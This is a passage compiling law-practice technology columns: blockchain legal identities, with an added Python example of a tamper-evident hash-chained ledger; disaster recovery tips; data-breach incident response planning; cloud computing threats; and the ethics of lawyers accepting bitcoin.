Another speaker, David Fisher, the founder and CEO of Integra Ledger, said that the key application of blockchain in law will be universal legal identities. Virtually anything or anyone will have a unique digital identity — legal matters, documents, individuals, entities, billing entities, and more. The identities will provide proof of existence and uniqueness, without identifying details, that can be used by all Integra-compliant software.

The consortium’s vision, Fisher said, is for every major law firm and corporate legal department to be a node in the blockchain with a synchronized copy of all the sequential ledger entries of identities. This will lead, in turn, to an open market for innovation in which these Integra identities will be referenced by:

  • Other blockchains
  • Legacy software companies, in order to add functionality
  • Smart contracts
  • Custom apps developed by corporate legal departments and law firms
  • Applications developed by other consortia and working groups
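To make the properties described above concrete (entries that are signed, chained together, replicated on many nodes, and that prove an identity exists without storing identifying details), here is an added example; it is not the consortium’s or Integra Ledger’s code. The entry format, the node names and the use of HMAC-SHA256 in place of a public-key signature are assumptions made for the example.

```python
import copy
import hashlib
import hmac
import json

# Added example, not the consortium's or Integra Ledger's code. A minimal
# append-only, hash-chained ledger of "legal identities" (client, matter,
# document). Each entry stores only a commitment (a salted SHA-256 of the
# identifying details, so the ledger proves existence and uniqueness without
# revealing the details), links to the previous entry's hash, and is signed by
# the node that appended it. HMAC-SHA256 stands in for a public-key signature so
# the example runs with the standard library alone; a real ledger would use one.

GENESIS_HASH = "0" * 64
SIGNED_FIELDS = ("index", "kind", "commitment", "prev_hash", "signer")


def commit_identity(details: str, salt: bytes) -> str:
    """Commitment to identifying details; the details themselves never enter the ledger."""
    return hashlib.sha256(salt + details.encode("utf-8")).hexdigest()


def entry_hash(entry: dict) -> str:
    """Canonical hash of an entry's content (its own hash and signature excluded)."""
    body = json.dumps({k: entry[k] for k in SIGNED_FIELDS}, sort_keys=True)
    return hashlib.sha256(body.encode("utf-8")).hexdigest()


def sign(node_key: bytes, digest: str) -> str:
    """Node 'signature' over an entry hash (HMAC stand-in, see note above)."""
    return hmac.new(node_key, digest.encode("utf-8"), hashlib.sha256).hexdigest()


def append_entry(ledger: list, kind: str, commitment: str, signer: str, node_key: bytes) -> dict:
    """Append an identity entry chained to the current head of the ledger."""
    prev_hash = ledger[-1]["hash"] if ledger else GENESIS_HASH
    entry = {"index": len(ledger), "kind": kind, "commitment": commitment,
             "prev_hash": prev_hash, "signer": signer}
    entry["hash"] = entry_hash(entry)
    entry["signature"] = sign(node_key, entry["hash"])
    ledger.append(entry)
    return entry


def verify_ledger(ledger: list, node_keys: dict):
    """Walk the chain from genesis. Returns (True, None) if every entry links to its
    predecessor, its stored hash matches its content, and its signature verifies
    under the signer's key; otherwise (False, index of the first bad entry)."""
    expected_prev = GENESIS_HASH
    for i, e in enumerate(ledger):
        if e["index"] != i or e["prev_hash"] != expected_prev:
            return False, i
        if entry_hash(e) != e["hash"]:
            return False, i
        key = node_keys.get(e["signer"])
        if key is None or not hmac.compare_digest(sign(key, e["hash"]), e["signature"]):
            return False, i
        expected_prev = e["hash"]
    return True, None


def replicas_agree(replicas: list) -> bool:
    """Nodes each hold a synchronized copy; they agree iff all head hashes match."""
    heads = {r[-1]["hash"] if r else GENESIS_HASH for r in replicas}
    return len(heads) == 1


# Constructed sample data: fixed node keys and salt so the run is reproducible.
NODE_KEYS = {"firm-a": b"constructed-key-for-node-firm-a", "firm-b": b"constructed-key-for-node-firm-b"}
SALT = b"constructed-salt"


def build_sample_ledger() -> list:
    ledger = []
    append_entry(ledger, "client", commit_identity("Example Client LLC", SALT), "firm-a", NODE_KEYS["firm-a"])
    append_entry(ledger, "matter", commit_identity("Example Client LLC / matter 2017-042", SALT), "firm-a", NODE_KEYS["firm-a"])
    append_entry(ledger, "document", commit_identity("engagement letter, rev 3", SALT), "firm-b", NODE_KEYS["firm-b"])
    return ledger


def tamper(ledger: list, index: int, rehash: bool = False, node_key=None) -> list:
    """Return a copy with entry `index` altered. With rehash=True the tamperer also
    recomputes the hash and re-signs with a key it holds; the chain still exposes
    the change because the *next* entry's prev_hash no longer matches."""
    bad = copy.deepcopy(ledger)
    bad[index]["commitment"] = commit_identity("substituted identity", SALT)
    if rehash:
        bad[index]["hash"] = entry_hash(bad[index])
        bad[index]["signature"] = sign(node_key, bad[index]["hash"])
    return bad


if __name__ == "__main__":
    good = build_sample_ledger()
    print(verify_ledger(good, NODE_KEYS))                                        # (True, None)
    print(verify_ledger(tamper(good, 1), NODE_KEYS))                             # (False, 1)
    print(verify_ledger(tamper(good, 1, True, NODE_KEYS["firm-a"]), NODE_KEYS))  # (False, 2)
    print(replicas_agree([good, build_sample_ledger()]))                         # True
```

The third check is the instructive one: an insider who can re-sign a single entry is still caught, because the entry after it no longer links to the altered hash.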

The newly created Law Firm Innovation Index measures law firm innovation based on Google advanced searches for indications of innovation on the websites of the world’s largest law firms. The category that garnered the greatest number of hits was blockchain, with more than double the average number of hits than AI. Now does that mean that they are actually doing a lot with blockchain? No. Not necessarily. But they know where the action is and want to be seen at the forefront of this new movement.

This blockchain train has bolted out of the station with amazing speed. Maybe unseemly speed. As we were finishing this article, it was reported that a piece of malware called Trickbot was targeting cybercurrencies. This could be a challenge to the stability and reliability of the blockchain platform, which must work out how to tell whether cryptocurrency was stolen or acquired through a malware attack, since every coin carries its own unique code.

If you build it, they will come. We refer, of course, to cybercriminals.

A Dozen Disaster Recovery Tips From the ABA Law Practice Division

From co-author Nelson: Normally, I write SLAW columns with Sensei VP John Simek, but in light of the recent and horrific disasters experienced by American law firms, I teamed up with Jim Calloway, Director of Management Assistance Program at Oklahoma Bar Association, to offer these disaster recovery tips.

  1. Immediately after a disaster, there is only one thing that matters – human life. Do what you can possibly do to help those in need and to ensure the safety of those who work with and for you. Supply your employees with all the support resources you can.
  2. Establish communications. Hopefully, you have a disaster recovery plan (if not, preparing and adopting a plan should go on your priority list now). Follow the plan, which should include multiple communication options – via e-mail, text, phone calls or a website. Someone should be responsible for tracking information about those who have reported they are safe and reporting those who have not. Consider contracting with a service that automates notifications and responses. Everyone should be reminded of their roles in the disaster recovery. Someone should be contacting local government authorities. You may need to have the post office hold your mail or send it to a different address – assuming mail is being delivered. Your plan should also address who is responsible for contacting FEMA, the courts, and opposing counsel (to reschedule dates as needed), active clients, your insurance company, bank, landlord and significant vendors, including your payroll service. You will need to ensure that staff and attorneys understand how to fulfill their duties if communications are widely disrupted.
  3. Communicate with your clients. As recent events have shown, this may not be easy. You may not have the ability to call, text, or e-mail. One alternative, since most firms do not host their own website, is to have a temporary home page set up explaining the status of your firm/practice and advising your clients how (or if) they are able to contact you. If your office is unusable, make sure the first person who has access puts up a sign with temporary contact information in large letters on the door or frontage. Do not just tape a piece of paper there. Use nails or even (gulp) spray paint. You may also want to advise clients of how courts are handling delays during the recovery period until communications are restored.
  4. Hopefully, you have your law firm data stored in the cloud. One of the advantages of cloud-based practice management solutions is that you should be able to access your data in the cloud once you have an Internet connection. Needless to say, your “cloud” solution should not be storing your data in your immediate geographic area unless you have a secondary cloud which is well out of harm’s way.
  5. If your e-mail is down, you certainly have a problem. Before the disaster strikes, you should have made sure that you have engaged an e-mail service vendor that “spools” (retains) your e-mail for delivery when you have power or better yet, synchronizes with your mailbox and provides an alternate mail transport mechanism. Such vendors often provide spam filtering, phishing prevention, the ability to send large files, encryption, etc. Spread the word as quickly as possible when the spooled e-mail is released – this is often done best by phone or text since people may not be checking their e-mail regularly if service has been unavailable for any length of time. If you use a service that provides 100% e-mail availability, clients will not even know that your primary e-mail technology was down.
  6. If the disaster lasts for some time, how will you pay your employees? We actually saw airlifts of money during Katrina. Whatever your payment plan, implement it. If your cash flow allows, be generous with modest advances to employees to help them recover.
  7. Make sure your system passwords are stored (encrypted) in the cloud – you may need them as part of the recovery. Get a full report from your IT folks as to what is functional, what is not and the proposed path to getting all systems up and running. Lease or buy any equipment that needs replacement.
  8. If laptops or other mobile devices have been lost in the disaster, remote wipe them to ensure the security of the data. They should all be encrypted as well to minimize unauthorized access.
  9. Post-disaster looting and destruction is a fact of life. If you have an on-premises network and it is not well secured, secure it as soon as possible after the disaster is over. When it is safe to go to your office, take photos or videos of all damage for insurance purposes and remove (if necessary) the waterproof and fireproof safe which holds all your critical documents – which are hopefully replicated and encrypted in the cloud.
  10. If you still have a functional office, share what space you can with other attorneys. If you do not, seek out your colleagues who may have functional offices and ask for help. Alternatively, arrange for leased space. If your losses are great, you may be eligible to file a claim for emergency relief – investigate this avenue as it may be more immediate than any monies you receive from your insurance company.
  11. Accept assistance gratefully. We all like to think of ourselves as independent. We solve problems for others. But there’s no shame in receiving aid. Your bar association will be activating resources to assist you. Accept that bottle of water or free meal from aid workers if you need it. Ask colleagues if you are in need. The disasters bring out the worst in people, but also the best.
  12. Take care of yourself. Recovery from a disaster is a marathon, not a sprint. Lawyers tend to “overwork” themselves out of difficult situations. Rest and good nutrition are more important now than ever. Disaster brings an enormous amount of stress to you and everyone in the affected community. Be kind and generous. Forgive the inappropriate behavior of others. Hug your family members.

Further resources from the American Bar Association may be found on the resources page for the ABA’s Committee on Disaster Response and Preparedness.

What to Do When Your Data Is Breached

“When, not if.” This mantra among cybersecurity experts recognizes the ever-increasing incidence of data breaches. In an address at a major information security conference in 2012, then-director of the Federal Bureau of Investigation (FBI) Robert Mueller put it this way: “I am convinced that there are only two types of companies: those that have been hacked and those that will be. And even they are converging into one category: companies that have been hacked and will be hacked again.”

Mueller’s observation is true for attorneys and law firms as well as small businesses through Fortune 500 companies. There have now been numerous reports of law firm data breaches. The FBI has reported that it is seeing hundreds of law firms being increasingly targeted by hackers. Law firm breaches have ranged from simple (like those resulting from a lost or stolen laptop or mobile device) to highly sophisticated (like the deep penetration of a law firm network, with access to everything, for a year or more).

Lawyers and law firms are beginning to recognize this new reality, but all too often they expose themselves to unnecessary risk simply because they don’t have a response plan for security incidents and data breaches. Attorneys have ethical and common law duties to employ competent and reasonable measures to safeguard information relating to clients. Many attorneys also have contractual and regulatory requirements for security. Attorneys also have ethical and common law duties to notify clients if client data has been breached.

Compliance with these duties includes implementing and maintaining comprehensive information security programs, including incident response plans, for law practices of all sizes, from solos to the largest firms. The security programs and response plans should be appropriately scaled to the size of the firm and the sensitivity of the information.

THE OLD MANTRA: KEEP THE BARBARIANS AT BAY

In a more innocent time, we really thought we could keep the barbarians outside the walls that guard our data. The analogy was protecting the network like a fortress, with strong perimeter defenses, sometimes compared to walls and moats. Alas, those days are gone.

For years, the emphasis was on keeping villains—cybercriminals, state-sponsored agents, business espionage spies, and hackers—out. We went from fairly simple antivirus software and firewalls to more sophisticated antivirus software and next-generation firewalls, and, finally, to enterprise anti-malware security suites, next-generation security appliances, data loss protection and other strong technical defenses. The widespread use of mobile devices and remote connectivity, making data available outside protected networks, has added new challenges for defense.

The defensive tools have gotten more sophisticated and more effective. Sadly, what we have learned is that all the would-be intruders were not only matching the good guys step for step, they were outpacing them.

It took a surprisingly long time for everyone to “get it”—but in the end, the security community realized that if the bad guys are smart enough and target a particular entity, they are likely to be able to successfully scale the walls we built to keep them out. And with that realization, “detect and respond” became the new watchwords in cybersecurity.

Mind you, we are still trying to keep the bad guys out—that is our first line of defense. But now that we know that our first line of defense is too often a Maginot Line for sophisticated attackers, we have moved forward in our thinking.

Although detection and incident response have been necessary parts of comprehensive information security for years, they previously had taken a back seat to protection. Their increasing importance is now being recognized. Gartner, a leading technology consulting firm, has predicted that by 2020, 60 percent of enterprises’ information security budgets will be allocated for rapid detection-and-response approaches, up from less than 10 percent in 2014.

THE NEW MANTRA: IDENTIFY, PROTECT, DETECT, RESPOND, RECOVER

The increasing recognition of the importance of detection and response has been evolving for a number of years. It is a core part of the National Institute of Standards and Technology’s (NIST) Framework for Improving Critical Infrastructure Cybersecurity, Version 1.0, that was released in February 2014 (www.nist.gov/document-3766).

Although the framework is aimed at security of critical infrastructure, it is based on generally accepted security principles that can apply to all kinds of businesses and enterprises, including law firms. It provides a structure that organizations, regulators, and customers can use to create, guide, assess, or improve comprehensive cybersecurity programs. The framework, “created through public-private collaboration, provides a common language to address and manage cyber risk in a cost-effective way based on business needs, without placing additional regulatory requirements on businesses.”

The framework allows organizations—regardless of size, degree of cyber risk, or cybersecurity sophistication—to apply the principles and best practices of risk management to improve the security and resilience of critical infrastructure (as well as other information systems). It is called “Version 1.0” because it is supposed to be a “living” document that will be updated to reflect new technology and new threats—and to incorporate “lessons learned.” (NIST released drafts of Version 1.1 for public comment in January and December of 2017 and plans to release Version 1.1 in early 2018.)

The core of the framework, its magic words, are “identify, protect, detect, respond, and recover,” which should shape any law firm’s cybersecurity program.

“Identify and protect” was where we started in the early days of cybersecurity—and while those words are still important, “detect and respond” have surged forward as a new focus—along with, of course, recovering from security breaches, no easy task. It is especially tough if you don’t know you’ve been breached—and the average victim has been breached for seven months or more before the breach is discovered!

INCIDENT RESPONSE PLANS

The core of the respond function is advance planning. This means attorneys and law firms need a plan, usually called an incident response plan (IRP), which often is focused on data breaches, but “incidents” can refer to ransomware, attempted hacks, an insider accessing data without authorization, or a lost or stolen laptop or mobile device.

Most large firms now have these plans in place, but many smaller firms do not. More and more, clients and insurance companies are asking to review law firms’ IRPs. In the face of ever-escalating data breaches, now is a good time to develop and implement a plan or to update an existing one. After all, football teams don’t get the playbook on game day.

The problem with all plans is that they may not survive first contact with the enemy. That’s okay. Far worse is having no plan at all and reacting in panic with no structure to guide your actions. The first hour that a security consultant or law enforcement officer spends with a business or law firm after the discovery of a data breach is very unpleasant. Kevin Mandia, the founder of Mandiant (www.fireeye.com), a leading security firm, has called it “the upchuck hour.” It is not a happy time.

Don’t rely on a template IRP. No two law firms are identical, and all have different business processes, network infrastructures, and types of data. Although templates may serve as a starting point, an IRP must be customized to fit the firm—the smaller the firm, the shorter the plan is likely to be. For a solo practice, it may just be a series of checklists, with who to call for what. Books and standards have been written about IRPs. (See “Additional Resources” below for a few of our favorites.)

Qualified professionals also can be consulted for more details. The following is a condensed and, we hope, digestible overview.

THE ELEMENTS OF AN IRP

  • Internal personnel. Identify the internal personnel responsible for each of the functions listed in the IRP. Identify them by position titles rather than by name because people come and go. A broad-based team is required for a firm of any size: management, IT, information security, human resources, compliance, marketing, etc. Have a conference call bridge line identified in case a breach happens at night or on a weekend, and include home/cell phone numbers and personal as well as work e-mail addresses. This list will need to be updated regularly as people join or leave the firm.
  • Data breach lawyer. Identify the contact information for an experienced data breach lawyer—many large firms now have departments that focus on security and data breach response, and some smaller firms have a focus on the area. Don’t convince yourself that you can handle this without an attorney who is experienced in data breaches. Your data breach lawyer (if you selected a good one) will be an invaluable quarterback for your IRP team—and he or she may be able to preserve under attorney-client privilege much of the information related to the breach investigation.
  • Insurance policy. Identify the location of your insurance policy (which darn well better cover data breaches). You need to make sure you are covered before you start, and list the insurer’s contact information because you are going to need to call your insurer as soon as you are aware of a possible breach.
  • Law enforcement. Identify the contact information for law enforcement (perhaps your local FBI office), often the first folks called in.
  • Digital forensics consultant. Identify the contact information for the digital forensics consultant you would want to investigate and remediate the cause of the breach. Often, a firm has been breached for seven months or more before the breach is discovered—it will take time to unravel what went on.
  • Containment and recovery. Include in the IRP containment and recovery from a breach. A law firm that has been breached has an increased risk of a subsequent (or continuing) breach—either because the breach has not been fully contained or because the attacker has discovered vulnerabilities that it can exploit in the future.
  • Compromised data. Determine the data that has been compromised or potentially compromised. You’ll want to know if all data that should have been encrypted was indeed encrypted in transmission and in storage. If it was, this may lessen the notification burden. Identify any personally identifiable information (PII) that may have been compromised.
  • Systems logs. Identify and preserve systems logs for your information systems. If logging functions are not turned on or logs are not retained, start maintaining them before a breach.
  • Intrusion and data loss logs. If you have intrusion detection or data loss prevention software, logs from them should be preserved and provided to your investigators immediately. If you don’t, you may want to think about implementing such software.
  • Your bank. Identify the contact information for your bank in case your banking credentials have been compromised.
  • Public relations consultant (optional but often useful). Identify the contact information for a good public relations firm. If you are not required to make the breach public, you may not need one, but if it does go public, you may need to do some quick damage control. Your insurance coverage may provide for this, in which case the insurance company will put you in contact with the appropriate firm.
  • Clients and third parties. How will you handle any contact with clients and third parties, remembering that you may wish not to “reveal all” (if notice is not required) and yet need to achieve some level of transparency? Be forewarned that this is a difficult balance. You will feel like the victim of a data breach, but your clients will feel as though you have breached their trust in you. A data breach that becomes public can cause a mass exodus of clients, so work through your notification planning with great care. Be wary of speaking too soon before facts are fully vetted—it is a common mistake to try limiting the damage only to end up increasing it as the scope of the breach turns out to be far greater or different than first known.
  • How will you handle informing employees about the incident? How will you ensure that the law firm speaks with one voice and that employees do not spread information about the breach in person or online? How will your social media cover the breach, if at all?
  • Data breach notification law. If you have a data breach notification law in your state (and almost all do), put it right in the plan along with compliance guidelines. You may be required to contact your state attorney general. These laws vary widely, so be familiar with your own state law. Also, determine whether other states’ breach notice laws may apply owing to residences of employees or clients, location of remote offices, etc. Make sure that the relevant data breach regulations are referenced in the plan and attached to it.
  • Other legal obligations. Identify any impacted data that is covered by other legal obligations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA) or client contractual requirements, and comply with notice requirements.
  • Training on the plan. Conduct training on the plan. Make sure that everyone understands the plan and their role under it.
  • Testing the plan. Testing can range from a quick walk-through of hypothetical incidents to a full tabletop exercise. Include contacts with external resources to make sure that everything is up-to-date. This will help to make everyone familiar with the plan and to identify areas that should be revised.
  • Review of policies. Does the breach require that IT and information security controls and policies be updated or changed? Does what you learned from the breach require that the IRP itself be revised? The IRP should mandate at least an annual review even without an incident.

FINAL WORDS: PREPARE NOW!

The new paradigm in security is that businesses (including law firms) should prepare for when they will suffer a data breach, not for if they may suffer a breach. This requires security programs that include detection, response, and recovery, along with identification and protection of data and information assets. Successful response requires an effective incident response plan. Attorneys who are prepared for a breach are more likely to survive and limit damage. Those who are unprepared are likely to spend more money, lose more time, and suffer more client and public relations problems.

___

Additional Resources

ABA Standing Committee on Law and National Security, A Playbook for Cyber Events, Second Edition (American Bar Association 2014)

Paul Cichonski, Tom Millar, Tim Grance, and Karen Scarfone, Computer Security Incident Handling Guide, National Institute of Standards and Technology Special Publication 800-61, Rev. 2 (August 2012)

Federal Trade Commission, Data Breach Response: A Guide for Business (September 2016)

ISO/IEC 27035:2011 Information technology — Security techniques — Information security incident management (a consensus international standard)

Jason T. Luttgens, Matthew Pepe, and Kevin Mandia, Incident Response & Computer Forensics, Third Edition, McGraw-Hill (2014)

National Institute of Standards and Technology, Framework for Improving Critical Infrastructure Cybersecurity, Version 1.0 (February 2014) (NIST released drafts of Version 1.1 for public comment in January and December of 2017 and plans to release Version 1.1 in early 2018.)

U.S. Department of Health and Human Services, Office for Civil Rights, A Quick-Response Checklist (June 2017)

U.S. Department of Justice Cybersecurity Unit, Best Practices for Victim Response and Reporting of Cyber Incidents (April 2015)

___

This column was co-authored with David G. Ries (dries@clarkhill.com), Of Counsel in the Pittsburgh, Pennsylvania, office of Clark Hill, PLC. Nelson, Ries, and Simek are co-authors of Encryption Made Simple for Lawyers (ABA, 2015) and Locked Down: Practical Information Security for Lawyers, Second Edition (ABA, 2016).


The Dark Side of Cloud Computing

We have said for many years that the cloud will generally protect a law firm’s data better than the law firm would itself. As more and more law firms adopt Microsoft Office 365, thereby moving to the cloud, we have come to the conclusion that a few words of caution are in order when law firms entrust their data to the cloud.

With huge volumes of law firm confidential data (and data from other verticals) moving to the cloud, it is no wonder that the bad guys are taking aim at the clouds. And there seems to be a shift afoot, in which the main responsibility for protecting corporate data in the cloud belongs to the cloud customer rather than the cloud provider.

The Cloud Security Alliance (CSA) recently issued the latest version of its Treacherous 12 Top Threats to Cloud Computing Plus: Industry Insights report.

While there are many security concerns in the cloud, CSA’s list focuses on 12 concerns specifically related to the shared, on-demand nature of cloud computing. CSA conducted a survey of industry experts to gather professional opinions on the greatest security issues involving cloud computing. In order of severity, here are the 12 risks.

1. Data breaches

Data breaches can result from human error, application vulnerabilities, poor security practices – or they can be the result of a targeted attack. The data uncovered might be personally identifiable information, health records, financial information, trade secrets, intellectual property, etc. In our judgment, this is consistently the major concern for law firms.

2. Insufficient identity, credential, and access management

Criminals pretending to be legitimate users, operators, or developers can read, modify, and delete data; issue control plane and management functions; snoop on data in transit; or release malicious software that appears to originate from a legitimate source, according to CSA.

3. Insecure interfaces and application programming interfaces (APIs)

Cloud providers expose a set of software user interfaces (UIs) or APIs that customers use to manage and interact with cloud services. Provisioning, management, and monitoring are all performed with these interfaces, and the security and availability of general cloud services depends on the security of APIs. Clearly, they need to be designed to protect against accidental and malicious attempts to circumvent policy.

4. System vulnerabilities

System vulnerabilities are exploitable bugs in programs that attackers can use to infiltrate a system to steal data, take control of the system, or disrupt service operations. Vulnerabilities within the components of the operating system put the security of all services and data at risk. When there are multiple tenants in a cloud, systems from various businesses are placed close to each other and given access to shared memory and resources, creating a new attack surface. Not a great idea for law firms.

5. Account hijacking

Cloud services add a new threat to the landscape. If attackers gain access to a user’s credentials, they can watch activities and transactions, manipulate data (truly, the manipulation of data may be scarier than a data breach), return falsified information and redirect clients to illegitimate sites.

6. Malicious insiders

We have seen this time and again in law firms. A malicious insider such as a system administrator can access potentially sensitive information. Now imagine that malicious insider working for your cloud provider . . . systems that depend solely on cloud service providers for security are at greater risk.

7. Advanced persistent threats (APTs)

APTs are a form of cyber-attack that infiltrates systems to establish a foothold in the IT infrastructure of target companies, from which they steal data. APTs work stealthily over extended periods of time, often adapting to or eluding the security measures intended to defeat them. APTs can move laterally through networks and appear to be normal network traffic to realize their goals.

8. Data loss

An accidental deletion by the cloud service provider, or a physical catastrophe such as a fire or earthquake, can lead to the permanent loss of customer data unless the provider or cloud consumer takes adequate measures to back up data, using best practices in business continuity and disaster recovery. Multiple backups tested regularly are a requirement.

9. Insufficient due diligence

Executives need to develop a good checklist for due diligence when evaluating cloud providers. Many rush aboard without a considered study of the cloud provider.

10. Abuse and nefarious use of cloud services

Poorly secured cloud service deployments, free cloud service trials, and fraudulent account sign-ups via payment instrument fraud expose cloud computing models to malicious attacks. Bad actors might leverage cloud computing resources to target users, organizations, or other cloud providers. CSA cites examples of misuse of cloud-based resources including launching distributed denial-of-service attacks, e-mail spam, and phishing campaigns.

11. Denial of service (DoS)

DoS attacks are designed to prevent users of a service from being able to access their data or applications. By compelling a targeted cloud service to consume inordinate amounts of finite system resources such as processor power, memory, disk space, or network bandwidth, attackers can cause a system slowdown and leave all legitimate service users without access to services. This is not a theoretical threat – it has happened time and again in spite of good faith efforts to defend against such attacks.

12. Shared technology vulnerabilities

Cloud service providers deliver their services scalably by sharing infrastructure, platforms or applications. In general, this is a good thing, keeping costs down and allowing customers to scale up or down as needed. Cloud technology often divides the “as-a-service” offering without substantially changing the off-the-shelf hardware/software. Underlying components that comprise the infrastructure supporting cloud services deployment may not have been designed to offer strong isolation properties for a multi-tenant architecture or multi-customer applications. Shared technology vulnerabilities present a serious cybersecurity risk.

We are not trying to scare law firms away from cloud computing (just to be careful!), but it’s worth noting a study from last summer. A post in RCRWireless News said that a cyber security incident that takes a top three cloud provider offline for three to six days could cause anywhere between $6.9 and $14.7 billion in economic losses and between $1.5 and $2.8 billion in industry insured losses. That is one among many findings in a report published by Lloyd’s of London in partnership with the American Institutes for Research (AIR), which explores the impact a cloud failure could have on the economy.

The results of the report were based on the top 15 unnamed cloud providers in the U.S., which together constitute a 70% market share. In the event of three to six days of cloud downtime, the report found that Fortune 1000 companies will carry 37% of the ground-up losses and 43% of the insured losses. This is, obviously, particularly meaningful to very large law firms.

Businesses outside the Fortune 1000 are potentially at the greatest risk, carrying 63% share of economic losses and 57% of insured losses. Right out of the gate, we know that law firms consider being out of business 3-6 days unimaginable.

The corollary to a cloud disaster is mitigating your risk through cyber insurance. As the report says, “Organizations large and small are investing in risk and loss mitigation, including preventative security and post event recovery measures. The continued expansion of the cyber insurance market is both necessary and inevitable. Taking proactive measures now to build a risk-based cyber insurance ecosystem, ahead of the next truly catastrophic event, is essential to establishing more resilient communities and businesses.”

Bottom line, the cloud is generally a good place to be for law firms, but it is not without its threats and complications. For solo/small firms, we prefer a hybrid cloud, where law firms own their own equipment which is secured by their IT provider in a datacenter where they have the assurances of redundant power and Internet connections. This environment does require more work in order to properly configure and secure the systems, but leaves access to the data in the hands of the law firm and not the cloud provider.

A View From Virginia: Is It Ethical for Lawyers to Accept Bitcoins and Other Cryptocurrencies?


Bitcoins are digital currency – and yes, lawyers are beginning to accept them from clients. They are also known as virtual currency or cryptocurrency since cryptography is used to control the creation and transfer of bitcoins. They use peer-to-peer technology with no central authority or banks. The issuance of bitcoins and the managing of transactions are carried out collectively by the network.

Cryptocurrencies are created by a process called mining – by becoming a miner of cryptocurrencies, you make money (not much unless you are a major league miner). We won’t go into all of the technology that is used to create and verify the transactions since it will probably make your head hurt. Mining is accomplished by executing complicated mathematical operations, which take a lot of processing power. Hence the new phenomenon of cryptojacking, in which miners hijack the computing resources of unknowing victims so they can mine cryptocurrencies. And yes, your network could be victimized and there is little chance you would know unless so much power is used that your network slows down!

Today there are a lot of different cryptocurrencies. Bitcoin is still one of the most well-known and popular. However, other cryptocurrencies such as Ethereum, Bitcoin Cash, Monero, Litecoin, Ripple, Dash, etc., are gaining in popularity. They promise to scale better than Bitcoin and, in some cases, to provide stronger anonymity protections. As of April 26, 2018, the amazing number of different cryptocurrencies is 1,759 according to investing.com’s current list located at https://www.investing.com/crypto/currencies. With all the various “flavors” of digital currencies, we’re sure you’ll find one to your liking.

All cryptocurrency transactions are recorded in a distributed data structure called a blockchain, which is analogous to the ledger that deals with conventional money. Users send and receive bitcoins and other cryptocurrencies from their mobile device, computer or web application by using wallet software. You can even use cloud services to host and manage your wallet(s). Frankly, we prefer to have direct control and keep our wallet(s) stored on local devices. Don’t forget to back up your wallet(s).

We won’t get into all the technical and legal issues surrounding cryptocurrencies. Suffice it to say that these virtual currencies are here to stay and have value, although extremely volatile. In the U.S., cryptocurrencies are regarded as property rather than cash, with all the consequent tax implications.

Ethical issues

Let’s deal with some of the ethical issues concerning the acceptance of cryptocurrencies.

Nebraska is the only state we are aware of that has issued an ethical opinion specifically for Bitcoin usage. Nebraska’s opinion states that lawyers may accept payments in digital currencies, but must immediately convert them into U.S. dollars. Any refund of monies is also made in U.S. dollars and not in digital currency.

It is well known that an attorney can’t access client funds until they are earned, hence the existence of trust accounts. Also, an attorney can accept property as payment, but there must be a valuation for the property. This is where accepting digital currencies could get a little muddy. The Virginia Rules require that a fee for legal services must be “reasonable.” If attorneys receive digital currency, they should immediately convert and exchange it to actual currency AND put it in their escrow account. This effectively (and actually) puts a value on the cryptocurrency, which is exactly the process described in the Nebraska opinion. As part of the reconciliation and billing process, the lawyer would just note wording stating the number of bitcoins or other cryptocurrency and the market value at conversion. What the Nebraska opinion did not address is the handling of transaction fees, which can be rather substantial. The majority of lawyers will use an exchange to convert the cryptocurrency into cash. Who pays the fee for this conversion? And what if the client insists that the lawyer hold an advanced fee payment in bitcoin, instead of converting it to US currency? If bitcoin increases in value who gets the windfall—the lawyer or the client? Who bears the risk if bitcoin drops in value?

Criminal defense lawyers, of course, can face potential ethical and even criminal issues if clients pay them with assets they are determined to have acquired through illegal conduct. And yet, almost invariably, when we hear about lawyers accepting bitcoins as payment, the lawyers involved are criminal defense attorneys. For all the talk of “privacy” and the frequent inability to prove the connection between illegal conduct and bitcoins, it is clear that federal authorities believe the bitcoins are used to keep criminal activities financially untraceable. On the other hand, many legitimate businesses in the United States and Europe accept Bitcoin, including Dish Network, Overstock.com and Expedia.

Holding Cryptocurrencies

What if the lawyer wants to keep the cryptocurrency for their own use? Can they just keep the cryptocurrency in their own electronic wallet and deposit cash in the trust account on behalf of their client? The answer to this question depends on whether the bar considers bitcoin “funds” or “property” which a client entrusts to the lawyer. See Rule 1.15. Client “funds” belong in a trust account but client “property” must be safe kept by the lawyer. Since a lawyer cannot deposit bitcoin in a trust account, describing it as “funds” is a problem.

When a client gives a lawyer bitcoin, it is “property” not actual currency, but Rule 1.15 requires a lawyer to safeguard client property. This means making sure your digital “wallet” is secure and backed up. If the lawyer wants to keep the bitcoin and give the client the equivalent value in cash, those funds must go into the trust account if the bitcoin was payment of an advanced fee. This would require the client’s consent and would be subject to the business transaction rule under Rule 1.8(a), requiring that the terms of the transaction be fair and reasonable, confirmed in writing and that the client be advised to seek independent counsel before entering into the agreement.

One legal ethicist, the late Professor Ronald Rotunda, disagreed with the Nebraska Bar’s Ethics Opinion 17-03 that says the lawyer must convert the cryptocurrency immediately into US currency. See Ronald D. Rotunda, “Bitcoin and the Legal Ethics of Lawyers,” Justia Verdict Blog (November 6, 2017) at https://verdict.justia.com/2017/11/06/bitcoin-legal-ethics-lawyers. Professor Rotunda correctly explains how bar opinions have allowed that, subject to certain requirements, lawyers may accept from their clients stock and tangible property in lieu of cash for payment of legal fees even if the stock or property might fluctuate in value after the lawyer has accepted it. In Rotunda’s view, bitcoin is like gold in the sense that it is worth whatever people are willing to pay for it. The Nebraska opinion requires that lawyers “mitigate the risk of volatility and possible unconscionable overpayment for services” by not retaining the digital currency and by converting it “into U.S. dollars immediately upon receipt.” To Rotunda, it is a business decision not an ethics decision if the client wants to shift the risk of volatility to the lawyer. If a client and lawyer agree to pay the lawyer with stock in lieu of currency and the original value is reasonable at the time the parties contracted, the fact that the stock goes up or down in value does not make the acceptance of the stock unethical. The bar opinions “look back” to the time that payment was accepted to determine whether the payment was “reasonable,” and the lawyer may suffer a loss or a windfall, as the case may be. These bar opinions do not require that the lawyer sell the stock immediately to convert it to cash. In some initial public offerings, there may be “blackout periods” in which the lawyer is prohibited from selling the stock. That bitcoin might drastically drop in value resulting in the lawyer being underpaid is not an ethics issue either, according to Rotunda. Lawyers are educated adults and can make the call to sell or keep the bitcoin and accept that risk.

